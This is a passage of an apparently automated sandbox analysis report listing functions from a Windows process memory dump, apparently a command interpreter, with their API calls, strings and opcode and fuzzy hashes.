                                    • Instruction Fuzzy Hash: B6713071E4031A9BEB3D9B1CCC59BEA77BAEF54700F15019DEA09A7180DB709E84CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                    • towupper.MSVCRT ref: 011F6B89
                                    • iswalpha.MSVCRT ref: 011F6BBC
                                    • towupper.MSVCRT ref: 011F6BCF
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 011F6C01
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C16
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                    • String ID: :\$%04X-%04X
                                    • API String ID: 4001382275-3541097225
                                    • Opcode ID: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction ID: 0c3c56ab88baa50d37139f89b05fd20c98300b6c5c9de13c38edc88f738beb76
                                    • Opcode Fuzzy Hash: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction Fuzzy Hash: A1412D72A04211AAD738EBA59C19FB777ECEFA8B14F00041DFA95C7180EB74D540C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5930
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F594D
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5974
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F598F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseDeleteValue$CreateOpen
                                    • String ID: %s=%s
                                    • API String ID: 1019019434-1087296587
                                    • Opcode ID: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction ID: 85b48d7eeabf79c9d233efdde780bb9a860294e60f88be58d793f1591e34926a
                                    • Opcode Fuzzy Hash: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction Fuzzy Hash: 3D31B071D00615AAEB3D9B5A9C0DEAF7E79EF8AF64B05410CF90566250E7204E01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F53E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 011F5414
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 011F5429
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 011F5487
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 011F54D3
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 011F54FA
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 011F5531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                    • API String ID: 1580871199-2613899276
                                    • Opcode ID: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction ID: 2d2afdad2ff707ede3e1d5cbb998ba88fd6386d677440dfcc771fd4dd70a5b1b
                                    • Opcode Fuzzy Hash: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction Fuzzy Hash: 044187B1A001199BEB64CB25DC88B7E777EEB54648F00409DEB09E3245DB309E81CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011D5E10
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 011D5E43
                                    • _open_osfhandle.MSVCRT ref: 011D5E57
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011E9D2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 689241570-4257191772
                                    • Opcode ID: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction ID: d5e535bad670562cf576daf8d1995ffdf3640aac4a5b5a8043e3d48a8137f881
                                    • Opcode Fuzzy Hash: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction Fuzzy Hash: 15313932A00514AFE73CDAACA84DB6EBAFAE751639F210319E921E32C0DF704D018761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99memoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 011F5584
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 011F55BE
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 011F5601
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F5608
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 011F563A
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F5641
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 011F5648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                    • String ID: PE
                                    • API String ID: 3093239467-4258593460
                                    • Opcode ID: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction ID: 72bdf582741cb09c69ab96785492e3546fa00ff7b84a992b2119fa9095647a1d
                                    • Opcode Fuzzy Hash: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction Fuzzy Hash: 3C31E534600214A7EF68A7696C0CFBE7AAB9B94B25F44021CFF61D65C4DF318942CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F84FE, Relevance: 13.6, APIs: 9, Instructions: 96fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F850D
                                    • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 011F8515
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011F855B
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 011F8563
                                    • _get_osfhandle.MSVCRT ref: 011F8575
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 011F857D
                                    • memcmp.MSVCRT ref: 011F859F
                                    • _get_osfhandle.MSVCRT ref: 011F85D0
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011F85D8
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                    • String ID:
                                    • API String ID: 332413853-0
                                    • Opcode ID: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction ID: 4d4b5de74498c1a2dc1286201c72742d6594ea340d43259d74b5be6da6e05bb6
                                    • Opcode Fuzzy Hash: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction Fuzzy Hash: 5D21D231A00115ABDF2C9FA9AC4DE7B3BAAEF95364F004619F515C61D4DF714C40C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D81E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011D8254
                                    • memset.MSVCRT ref: 011D8280
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83BB
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset
                                    • String ID: %s
                                    • API String ID: 2221118986-3043279178
                                    • Opcode ID: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction ID: 7cca5aba5fa2d5464b9d8b81d44404aa2f8a26b34c34bb3d234dcb151feb8e8c
                                    • Opcode Fuzzy Hash: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction Fuzzy Hash: 3591A2712083429BD73DDF58C894BAFB7E5BF98204F04491DFA8987251DB34E944C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D8F70, Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _wcsnicmp.MSVCRT ref: 011D91B7
                                    • wcstol.MSVCRT ref: 011D91FC
                                    • wcstol.MSVCRT ref: 011D928A
                                    • longjmp.MSVCRT(?,000000FF,8C8BFE4F,-00000002,?,00000000), ref: 011F08B2
                                    • longjmp.MSVCRT(?,000000FF), ref: 011F08C6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                    • String ID:
                                    • API String ID: 2863075230-0
                                    • Opcode ID: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction ID: 8a321189e41723879131518aa523104b78af93cb225adccae0a9bc184099677d
                                    • Opcode Fuzzy Hash: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction Fuzzy Hash: 8CF1E175D0020A9BDF2CCFA8C4846FEBBB5BF88708F19421DD916A7384EB715901CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E501F
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • memset.MSVCRT ref: 011E5098
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50A7
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50E1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E516F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E517D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$EnvironmentVariable
                                    • String ID: DIRCMD
                                    • API String ID: 1405722092-1465291664
                                    • Opcode ID: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction ID: 9df05a81d3d1e3ea09cbe4502f8e4b083b1439eed2b9887544558e7936430aac
                                    • Opcode Fuzzy Hash: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction Fuzzy Hash: 7E7139B160CB829FD768CFA9D88869BBBE5BFD4308F04492EF59983250DB309544CB57
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 011F1A4D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F1A5F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 011F1A68
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLast$CloseCreateHandleSemaphore
                                    • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                    • API String ID: 2276426104-46676964
                                    • Opcode ID: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction ID: f9ea3adfe148da17dcd83e22b9dbe5fc151c1b47d0200f660f2caf3e00ac0daf
                                    • Opcode Fuzzy Hash: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction Fuzzy Hash: 91412332B4016AEBDB2DDE28C958BAA37E5FF94310F15416CEA05E7284DB70CD04CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D6785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$iswdigit
                                    • String ID: +-~!$<>+-*/%()|^&=,
                                    • API String ID: 2770779731-632268628
                                    • Opcode ID: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction ID: 0d3cac2b9771f7124005ed13b5228e74fb370cb20230452fd0d6071d9c53e047
                                    • Opcode Fuzzy Hash: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                    • Instruction Fuzzy Hash: E61194B6604302EF9B2C9B1EE85997677E8EFAA675320042EF581C7581FF21D800C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB610, Relevance: 12.2, APIs: 8, Instructions: 188COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011E987D
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9885
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,011E65F0,?,011E64F0), ref: 011E98C4
                                    • _get_osfhandle.MSVCRT ref: 011E98DD
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E98E5
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9968
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                    • String ID:
                                    • API String ID: 1333215474-0
                                    • Opcode ID: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction ID: 4b6af5c88d5ffea4c74fa34773138b1681615abdef8cfce3835f756827ae972a
                                    • Opcode Fuzzy Hash: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                    • Instruction Fuzzy Hash: FC51C531B0070AEBDB2CEBB8D85DB6EB7E8EB14709F05452AE502D7281EB70D940CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC923, Relevance: 10.8, APIs: 7, Instructions: 281COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DC9CF
                                    • _wcsicmp.MSVCRT ref: 011DC9E5
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                    • String ID:
                                    • API String ID: 2943530692-0
                                    • Opcode ID: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction ID: e635eb14b41ad880cde4bf3ec2172fe7cba291c3e8be8141d8583cab9848a835
                                    • Opcode Fuzzy Hash: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                    • Instruction Fuzzy Hash: E3912735B006129BDB3DEFBC985836ABBE1BB48314B15492DD916D72C4FB709981CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5E50, Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011E5EE4
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID:
                                    • API String ID: 3458554142-0
                                    • Opcode ID: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction ID: 010b64fdb8a305bacb96ac5723d9e6f551a3aa69f37ae9c0de960ea80e4a7937
                                    • Opcode Fuzzy Hash: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction Fuzzy Hash: A991C174904A05DEEB2DDFA8E84CAAEBBF5FF58714F10811EE805D7294EB304541CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4D3E
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4E9A
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 011F4F8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Enum$Open
                                    • String ID: %s=%s$.$\Shell\Open\Command
                                    • API String ID: 2886760741-1459555574
                                    • Opcode ID: a64f60d8e864bbc73c0f5a92aa3eb1a372da650b1ed6a00d734aef6fdf5f5e78
                                    • Instruction ID: 532dcdae4eadcfb54ca096d0ade0e334b8c303a924ae03ce7293fde916db9f89
                                    • Opcode Fuzzy Hash: a64f60d8e864bbc73c0f5a92aa3eb1a372da650b1ed6a00d734aef6fdf5f5e78
                                    • Instruction Fuzzy Hash: A7816975A0022547EB3C9F2CDC98BFB3769EB94304F0542ACEA1A97681EB749E418791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB2B0, Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011DB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 011DB448
                                      • Part of subcall function 011DB42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 011DB460
                                      • Part of subcall function 011DB42E: NtClose.NTDLL(00000000), ref: 011DB4B1
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 011DB3A5
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011DB3D3
                                    • RtlNtStatusToDosError.NTDLL ref: 011F133F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1346
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 011F13B6
                                    • wcsstr.MSVCRT ref: 011F13D1
                                    • wcsstr.MSVCRT ref: 011F13EF
                                      • Part of subcall function 011DB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,011F95EF,011E9564,00000001,?), ref: 011DB421
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                    • String ID:
                                    • API String ID: 1313749407-0
                                    • Opcode ID: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
